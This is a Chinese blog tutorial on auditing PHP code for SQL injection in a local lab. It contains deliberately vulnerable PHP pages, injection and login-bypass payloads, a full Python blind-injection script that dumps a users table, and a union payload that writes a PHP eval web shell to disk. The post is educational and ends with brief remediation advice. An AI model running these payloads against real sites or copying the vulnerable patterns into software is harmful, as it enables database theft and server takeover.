PHP代码审计基础:SQL注入漏洞

最新推荐文章于 2025-03-22 02:14:16 发布
最新推荐文章于 2025-03-22 02:14:16 发布
阅读量962 收藏 1
点赞数 2
分类专栏: 代码审计:基础
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_43573676/article/details/110040259
版权

文章目录

SQL注入介绍

SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。

环境搭建

创建数据库
create database admin;
use admin;

create table user (
	ID int primary key, 
	username varchar(10) not null,
	password varchar(20) not null
);

insert into user(ID,username,password)values(1,'admin',123456),(2,'root','root'),(3,'guest','666666');
编写注入页面
<?php
# 连接数据库
$conn = mysqli_connect("localhost","root","root","admin") or die("数据库连接失败!".mysql_error($conn));
# 构造SQL语句
$id = $_GET['id'];
$sql = "SELECT * FROM user WHERE id=$id";
# 执行SQL语句
$result = mysqli_query($conn,$sql) or die(mysqli_error($conn));
# 循环输出返回值
while ($row = mysqli_fetch_array($result))
{
    echo "ID: ".$row['ID'].'<br>';
    echo "username: ".$row['username'].'<br>';
    echo "password: ".$row['password'].'<br>';
}
# 关闭连接
mysqli_close($conn);
# 打印SQL语句
echo '<hr>'.'<br>'.$sql;
?>
?>

效果:
在这里插入图片描述

数字型注入与字符型注入的区别

数字型注入

我们上面构造的注入页面就是一个数字型的注入页面,变量id拼接在SQL语句中,没有单引号的保护,就容易造成SQL注入。

payload:

and 1=1	# 正常
and 1=2 # 不正常

在这里插入图片描述

字符型注入

我们把上面构造的注入页面中的变量sql改一下,就变成字符型注入了:

$sql = "SELECT * FROM user WHERE id='$id'";

这里即使加上了单引号的保护,我们只要把他的单引号闭合一下就依然可以注入

payload:

# 正常
?id=3' and 1=1--+
# 报错
?id=1' and 1=2--+

在这里插入图片描述

所以,字符型注入与数字型注入的根本区别在于,需不需要进行单引号闭合

POST注入

编写登录页面

这里简单写了一个登陆页面,有POST注入跟万能密码登录

login.html:

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>后台登录</title>
</head>
<body>
<form action="login.php" method="post">
    账号:<input type="text" name="username"><br><br>
    密码:<input type="password" name="password"><br><br>
    <input type="submit" value="登录" name="login">
</form>
</body>
</html>

login.php

<?php
# 判断是否进行了POST传值
if (!isset($_POST)){
    die("数据不能为空!");
}else {
    # 接受的变量赋值给username与password
    $username = $_POST['username'];
    $password = $_POST['password'];
    # 连接数据库
    $conn = mysqli_connect("localhost","root","root","admin") or die("数据库连接失败!".mysql_error($conn));
    # 构造SQL语句
    # 万能密码‘or'='or‘绕过登录验证
    $sql = "SELECT * FROM USER WHERE USERNAME='$username' AND PASSWORD='$password'";
    # 输出SQL语句,方便学习
    echo $sql;
    # 执行SQL语句并把结果集返回到$result中
    $result = mysqli_query($conn,$sql) or die(mysqli_error($conn));;
    # 把$result中的mun_rows属性值返回给$row_cnt
    $row_cnt  =  mysqli_num_rows ( $result );
    # 如果值为零
    if ($row_cnt === 0)
    {
        # 打印失败
        echo '登录失败!';
    # 或者$row_cnt的值为1
    }elseif($row_cnt === 1)
    {
        # 把$result的结果返回给$row
        $row = mysqli_fetch_array($result);
        # 打印欢迎xx登陆系统,xxx为数组row中name的值
        echo '欢迎'.$row['username'].'登录系统!';
    }
}
万能密码

原理就是我们在审计的时候看一下它的SQL语句是怎么闭合的,有没有做转义,去进行一个绕过。

# 万能密码or'='or
POST注入

这里不手工了,直接burp抓个包sqlmap跑一下吧!

在这里插入图片描述
抓包:

在这里插入图片描述
跑一下:

Sqlmap -r C:\Users\Administrator\Desktop\1.txt --batch

在这里插入图片描述

HTTP头注入

在这里插入图片描述

盲注

盲注最大的特点就是注入返回的数据不会在页面上进行显示

这里我就借花献佛,用sql-libs的第八关来演示一下吧

关键代码:

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

	if($row)
	{
  	echo '<font size="5" color="#FFFF00">';	
  	echo 'You are in...........';
  	echo "<br>";
    	echo "</font>";
  	}
	else 
	{
	
	echo '<font size="5" color="#FFFF00">';
	//echo 'You are in...........';
	//print_r(mysql_error());
	//echo "You have an error in your SQL syntax";
	echo "</br></font>";	
	echo '<font color= "#0000ff" font size= 3>';	
	}

正确的时候显示的you are in… 错误的时候就是什么都显示

猜数据库名第一个字母具体过程,使用二分法

http://127.0.0.1/sql1/Less-8/?id=1%27%20and%20if(ascii(substr((select%20database()),1,1))%3E96,1,0)%20%23
http://127.0.0.1/sql1/Less-8/?id=1%27%20and%20if(ascii(substr((select%20database()),1,1))%3E110,1,0)%20%23
http://127.0.0.1/sql1/Less-8/?id=1%27%20and%20if(ascii(substr((select%20database()),1,1))%3E120,1,0)%20%23
http://127.0.0.1/sql1/Less-8/?id=1%27%20and%20if(ascii(substr((select%20database()),1,1))%3E115,1,0)%20%23返回错误,不大于115,即第一个字母的ascii为115,即字母s
http://127.0.0.1/sql1/Less-8/?id=1%27%20and%20if(ascii(substr((select%20database()),1,1))%3E110,1,0)%20%23
http://127.0.0.1/sql1/Less-8/?id=1%27%20and%20if(ascii(substr((select%20database()),1,1))%3E111,1,0)%20%23
http://127.0.0.1/sql1/Less-8/?id=1%27%20and%20if(ascii(substr((select%20database()),1,1))%3E114,1,0)%20%23返回正确,大于114

盲注过程是漫长的,一般是自己写脚本或使用工具辅助

写脚本之前要知道原理,上面的就是原理

下面基于这个学着写了个提取users表数据的完整脚本,大家可以参考下,当然如果大家用sqlmap也可以

Python编写exp
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Date: 2020/06/16
# Created by Shadow

import urllib2
import urllib

success_str = "You are in"
getTable = "users"

index = "0"
url = "http://1.1.1.130:86/Less-8/?id=1"
database = "database()"
selectDB = "select database()"
selectTable = "select table_name from information_schema.tables where table_schema='%s' limit %d,1"

asciiPayload = "' and ascii(substr((%s),%d,1))>=%d #"
lengthPayload = "' and length(%s)>=%d #"
selectTableCountPayload = "'and (select count(table_name) from information_schema.tables where table_schema='%s')>=%d #"

selectTableNameLengthPayloadfront = "'and (select length(table_name) from information_schema.tables where table_schema='%s' limit "
selectTableNameLengthPayloadbehind = ",1)>=%d #"


# 发送请求,根据页面的返回的判断长度的猜测结果
# string:猜测的字符串    payload:使用的payload    length:猜测的长度
def getLengthResult(payload, string, length):
    finalUrl = url + urllib.quote(payload % (string, length))
    res = urllib2.urlopen(finalUrl)
    if success_str in res.read():
        return True
    else:
        return False


# 发送请求,根据页面的返回的判断猜测的字符是否正确
# payload:使用的payload    string:猜测的字符串    pos:猜测字符串的位置    ascii:猜测的ascii
def getResult(payload, string, pos, ascii):
    finalUrl = url + urllib.quote(payload % (string, pos, ascii))
    res = urllib2.urlopen(finalUrl)
    if success_str in res.read():
        return True
    else:
        return False


# 注入
def inject():
    # 猜数据库长度
    lengthOfDBName = getLengthOfString(lengthPayload, database)
    print ("length of DBname: " + str(lengthOfDBName))
    # 获取数据库名称
    DBname = getName(asciiPayload, selectDB, lengthOfDBName)

    print ("current database:" + DBname)

    # 获取数据库中的表的个数
    # print selectTableCountPayload
    tableCount = getLengthOfString(selectTableCountPayload, DBname)
    print ("count of talbe:" + str(tableCount))

    # 获取数据库中的表
    for i in xrange(0, tableCount):
        # 第几个表
        num = str(i)
        # 获取当前这个表的长度
        selectTableNameLengthPayload = selectTableNameLengthPayloadfront + num + selectTableNameLengthPayloadbehind
        tableNameLength = getLengthOfString(selectTableNameLengthPayload, DBname)
        print ("current table length:" + str(tableNameLength))
        # 获取当前这个表的名字
        selectTableName = selectTable % (DBname, i)
        tableName = getName(asciiPayload, selectTableName, tableNameLength)
        print (tableName)

    selectColumnCountPayload = "'and (select count(column_name) from information_schema.columns where table_schema='" + DBname + "' and table_name='%s')>=%d #"
    # print selectColumnCountPayload
    # 获取指定表的列的数量
    columnCount = getLengthOfString(selectColumnCountPayload, getTable)
    print ("table:" + getTable + " --count of column:" + str(columnCount))

    # 获取该表有多少行数据
    dataCountPayload = "'and (select count(*) from %s)>=%d #"
    dataCount = getLengthOfString(dataCountPayload, getTable)
    print ("table:" + getTable + " --count of data: " + str(dataCount))

    data = []
    # 获取指定表中的列
    for i in xrange(0, columnCount):
        # 获取该列名字长度
        selectColumnNameLengthPayload = "'and (select length(column_name) from information_schema.columns where table_schema='" + DBname + "' and table_name='%s' limit " + str(
            i) + ",1)>=%d #"
        # print selectColumnNameLengthPayload
        columnNameLength = getLengthOfString(selectColumnNameLengthPayload, getTable)
        print ("current column length:" + str(columnNameLength))
        # 获取该列的名字
        selectColumn = "select column_name from information_schema.columns where table_schema='" + DBname + "' and table_name='%s' limit %d,1"
        selectColumnName = selectColumn % (getTable, i)
        # print selectColumnName
        columnName = getName(asciiPayload, selectColumnName, columnNameLength)
        print (columnName)

        tmpData = []
        tmpData.append(columnName)
        # 获取该表的数据
        for j in xrange(0, dataCount):
            columnDataLengthPayload = "'and (select length(" + columnName + ") from %s limit " + str(j) + ",1)>=%d #"
            # print columnDataLengthPayload
            columnDataLength = getLengthOfString(columnDataLengthPayload, getTable)
            # print columnDataLength
            selectData = "select " + columnName + " from users limit " + str(j) + ",1"
            columnData = getName(asciiPayload, selectData, columnDataLength)
            # print columnData
            tmpData.append(columnData)

        data.append(tmpData)

    # print data
    # 格式化输出数据
    # 输出列名
    tmp = ""
    for i in xrange(0, len(data)):
        tmp += data[i][0] + "    "
    print (tmp)
    # 输出具体数据
    for j in xrange(1, dataCount + 1):
        tmp = ""
        for i in xrange(0, len(data)):
            tmp += data[i][j] + "    "
        print (tmp)


# 获取字符串的长度
def getLengthOfString(payload, string):
    # 猜长度
    lengthLeft = 0
    lengthRigth = 0
    guess = 10
    # 确定长度上限,每次增加5
    while 1:
        # 如果长度大于guess
        if getLengthResult(payload, string, guess) == True:
            # 猜测值增加5
            guess = guess + 5
        else:
            lengthRigth = guess
            break
    # print "lengthRigth: " + str(lengthRigth)
    # 二分法查长度
    mid = (lengthLeft + lengthRigth) / 2
    while lengthLeft < lengthRigth - 1:
        # 如果长度大于等于mid
        if getLengthResult(payload, string, mid) == True:
            # 更新长度的左边界为mid
            lengthLeft = mid
        else:
            # 否则就是长度小于mid
            # 更新长度的右边界为mid
            lengthRigth = mid
        # 更新中值
        mid = (lengthLeft + lengthRigth) / 2
        # print lengthLeft, lengthRigth
    # 因为lengthLeft当长度大于等于mid时更新为mid,而lengthRigth是当长度小于mid时更新为mid
    # 所以长度区间:大于等于 lengthLeft,小于lengthRigth
    # 而循环条件是 lengthLeft < lengthRigth - 1,退出循环,lengthLeft就是所求长度
    # 如循环到最后一步 lengthLeft = 8, lengthRigth = 9时,循环退出,区间为8<=length<9,length就肯定等于8
    return lengthLeft


# 获取名称
def getName(payload, string, lengthOfString):
    # 32是空格,是第一个可显示的字符,127是delete,最后一个字符
    tmp = ''
    for i in xrange(1, lengthOfString + 1):
        left = 32
        right = 127
        mid = (left + right) / 2
        while left < right - 1:
            # 如果该字符串的第i个字符的ascii码大于等于mid
            if getResult(payload, string, i, mid) == True:
                # 则更新左边界
                left = mid
                mid = (left + right) / 2
            else:
                # 否则该字符串的第i个字符的ascii码小于mid
                # 则更新右边界
                right = mid
            # 更新中值
            mid = (left + right) / 2
        tmp += chr(left)
        # print tmp
    return tmp


def main():
    inject()


main()

注入的利用方式

查询数据

判断完列长度后,我们就用union联合查询来爆敏感信息:

?id=3'union select @@datadir,user(),database()%23

在这里插入图片描述

读写文件

这里我们写一个一句话进去,这个一句话写的时候最好十六进制编码:

0x3C3F70687020406576616C5B245F504F53545B2761275D5D3B3F3E

payload:

?id=1' union select 1,'0x3C3F70687020406576616C28245F504F53545B315D293F3E',3 into outfile "C:/phpstudy_pro/WWW/A_testCode/sql/1.php"%23

执行结果:
在这里插入图片描述
在这里插入图片描述

菜刀连接:
在这里插入图片描述
再来读一下文件:

payload:

?id=1' union select 1,2,load_file('C:/phpstudy_pro/WWW/A_testCode/sql/login.html')%23

运行结果:
在这里插入图片描述

命令执行

仅限linux环境下

system 系统命令;

修复方案

  • 使用预编译语句
  • 使用存储过程
  • 检查函数类型
  • 使用安全函数
【零基础php代码审计sql注入
课嗨教育的专栏
07-24 350
此篇文章整体来讲,介绍的并不是特别的详细,在修复注入这块建议使用参数化查询,更为稳妥一些,其他的修复方案比较考验开发人员写代码过程中的一些注意点,稍有不慎可能你感觉这个漏洞修复了,其实就是换了个方式。主要作用是用于函数作用查看,我们本文主要讲的是sql注入,当然除sql注入以外的其他漏洞的相关函数也是可以通过php官网查看的,当然为了提升个人php代码阅读能力也可以通过php官网进行学习。在很多人眼里,代码审计基础就是代码,这句话没错,但是如果不会代码,我们是否可以学会代码审计?...
Java代码审计篇:SQL注入
hackzkaq的博客
12-01 1437
前期与常规注入代码审计一样,找sql语句看是否存在字符串拼接,如果存在,通过查找参数的调用逻辑,理清逻辑,在构造payload时,先注册一个正常的用户名,但是用户名是带有sql语句的,比如 “ ‘union select user(),2.3# “,此时在登陆的时候就可以显示对应的信息。MyBatis 的 like 子句中使用#{}程序会报错,所以为了避免报错,在开发的时候使用${},当使用like ‘#%{name}%’时,会报错。而使用like ‘$%{name}%’,时会正常执行。
SQL注入进阶篇一php代码审计
kali_Ma的博客
10-15 1527
前言 在实际的网站中和用户的输入输出接口不可能想那样没有防御措施的。现在各大网站都在使用waf对网站或者APP的业务流量进行恶意特征识别及防护,,避免网站服务器被恶意入侵。所以我们就需要绕过waf,这篇文章就用代码审计的方式给大家讲解一些sql的绕过技巧。 关键字过滤 部分waf会对关键字进行过滤,我们可以用大小写或者双写关键字来绕过。 源代码分析 <?php require 'db.php'; header('Content-type:text/html;charset=utf8'); $usern
SQL 注入漏洞原理以及修复方法
最新发布
m0_74824112的博客
03-22 812
具体来说,它是利用现有应用程序,将(恶意)的SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。注:把magic_quotes_gpc选项打开,在这种情况下所有的客户端GET和POST的数据都会自动进行addslashes处理,所以此时对字符串值的SQL注入是不可行的,但要防止对数字值的SQL注入,如用intval()等函数进行处理。使用参数化SQL语句,同时也能提高查询的效率。
php代码审计sql注入
qq_54030686的博客
12-05 1277
php代码审计sql注入 审计有几种方法,通读,指定函数,或者功能点 通读也就是每一个php都阅读一下,发现每一个页面实现的功能(对于我刚开始接触php来说,不可能) 功能点 自己使用源码,phpstudy搭建环境,使用AWVA,appscan,nessus等工具进行扫描,在输入框,文件上传等功能点进行测试,还可以根据回显,例如:不允许此类型文件上传,使用seay审计系统查询,审计相关方法 此篇为sql注入 sql注入产生的原因:用户输入恶意构造的语句,服务器后端未进行足够的校验,恶意语句直接添加sql
PHP代码审计-sql注入
博客地址 www.sec0nd.top
10-24 1563
最近想学代码审计了,但是我本身的代码水平不高,学的比较基础,适合入门级别的朋友们阅读先学php的审计,后面再学java的吧(java只懂一点点)就不太多的赘述漏洞和代码的基础了,遇到不会的搜索其他人的文章就可以学会的入门我是看的代码审计相关的一些知识后面实战的代码也在这里可以下载的。
PHP-代码审计-SQL注入
weixin_44110913的博客
08-26 653
代码审计 白盒测试 搭建成功后 用WEB漏洞扫描工具 利用网站的源码进行代码审计 准备工作 漏洞参数条件:函数 可控变量 列如sql注入 函数关键字:mysql_connect mysql_select_db mysql_query 等 可控变量关键字:$_GET $_POST $_REQUEST $_SERVER等 定点漏洞挖掘 分析漏洞产生条件 得到漏洞关键字 利用工具查找关键字 分析文件名进行判断筛选 对文件进行代码分析 跟踪变量 确定是否存在该漏洞 正常定点挖掘 数据库监控工具挖掘
PHP代码审计SQL注入漏洞分析
"这篇教程主要介绍了PHP代码审计中的SQL注入问题,包括普通注入和宽字节注入的案例分析,以及涉及的函数如str_replace、stripslashes和addslashes在防止SQL注入中的作用。" 在Web开发中,SQL注入是一种常见的安全...
信息安全技术:SQL注入漏洞.pptx
11-01
7. **代码审计**:定期审查代码,查找并修复潜在的SQL注入漏洞。 总的来说,SQL注入是一种严重的安全威胁,对于任何处理用户输入的应用程序来说,理解和预防SQL注入至关重要。通过采取适当的安全措施,可以大大降低...
CmsEasy代码审计SQL注入漏洞与file_get_contents风险
1. **SQL注入漏洞点1:**在`lib/admin/database_admin.php`的`dorestore_action()`方法中,存在一个潜在的SQL注入漏洞。当接收到来自GET参数`db_dir`的用户输入后,程序通过`front::scan($dir)`调用`tdatabase::...
《OWASP代码审计》学习——SQL注入漏洞审计
PICACHU+++的博客
08-04 776
注入攻击允许恶意用户向应用程序添加或注入内容和命令,以修改其行为。这些类型的攻击是常见且广泛的,黑客很容易测试网站是否易受攻击,攻击者也很容易利用这些攻击。如今,它们在尚未更新的遗留应用程序中非常常见。
php代码审计sql注入漏洞
qq_41503511的博客
02-22 329
SQL注入漏洞普通的注入编码注入二次urldecode注入 普通的注入 最普通的sql注入漏洞直接使用union联合查询就可以直接查询漏洞 代码如下 #普通sql注入 <?php header('Content-type: text/html; charset=UTF8');#设置utf8编码 $uid=$_GET['id'];#获取用户输入参数 $sql="select * from userinfo where id=$uid";#查询语句 $conn=mysql_connect('127.0.0
php代码审计SQL注入1
willow_liang的博客
10-27 241
** sql注入 ** sql注入产生的原因: 程序开发过程中不注意规范书写sq|语句和对特殊字符进行过滤,导致客户端可以通过全局变量POST和GET提交一些sq|语句正常执行. 条件: 可控制用户数据的输入; 原程序要执行的代码,拼接了用户输入的数据 危害: SQL注入攻击(SQL Injection),简称注入攻击、SQL注入,被广泛用于非法获取网站控制权,是发生在应用程序的数据库层上的安全漏洞。在设计程序,忽略了对输入字符串中夹带的SQL指令的检查,被数据库误认为是正常的SQL指令而运行,从而使数据库
PHP代码审计笔记--SQL注入
11-01 127
    0X01 普通注入 SQL参数拼接,未做任何过滤 <?php $con = mysql_connect("localhost","root","root"); if (!$con){die('Could not connect: ' . mysql_error());} mysql_select_db("test", $con); $id = stripc...
php sql注入审计,PHP代码审计SQL注入漏洞
weixin_34221599的博客
04-01 186
https://blog.youkuaiyun.com/God_XiangYu/article/details/97898230当你的才华还撑不起你的野心时那你就应该静下心来学习代码审计学习线上实验,都是CE一边实操,一边整理的笔记,方便以后翻看时,可快速查阅。目录SQL注入漏洞审计简介:SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语...
PHP代码审计入门(SQL注入漏洞挖掘基础)
weixin_30449239的博客
09-02 387
SQL注入漏洞 SQL注入经常出现在登陆页面、和获取HTTP头(user-agent/client-ip等)、订单处理等地方,因为这几个地方是业务相对复杂的,登陆页面的注入现在来说大多数是发生在HTTP头里面的client-ip和x-forward-for。 1.普通注入 普通注入是指最容易利用的SQL注入漏洞,比如直接通过注入union查询就可以查询数据库,一般的SQL注入...
php代码审计-sql注入初级篇
MSB_WLAQ的博客
10-14 370
概述 代码审计顾名思义就是检查源代码中的缺点和错误信息,分析并找到这些问题引发的安全漏洞,并提供代码修订措施和建议。这篇文章的目的是为了让小伙伴们对php代码审计有一个基本的了解,采用的代码都是自己写的仅仅能体现出漏洞所以会略显简洁。并且这次文章的主要内容为代码审计所以不会写太多的注入语句,更多的是对代码的分析,有兴趣的同学可以百度查查资料。 环境要求 phpstudy和一篇简单易懂的php源码 sql注入 SQL 注入SQL Injection) 是发生在 Web 程序中数据库层的安全漏洞,是
PHP代码审计系列基础文章(一)之SQL注入漏洞
FreeBuf_的博客
11-14 1274
在审计SQL注入的时候,我们首先要找到对应的传参点,更要多关注代码中正常SQL语句的规则和过滤情况,最重要的是要闭合正常的SQL语句来,最终执行我们想要执行的SQL语句。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值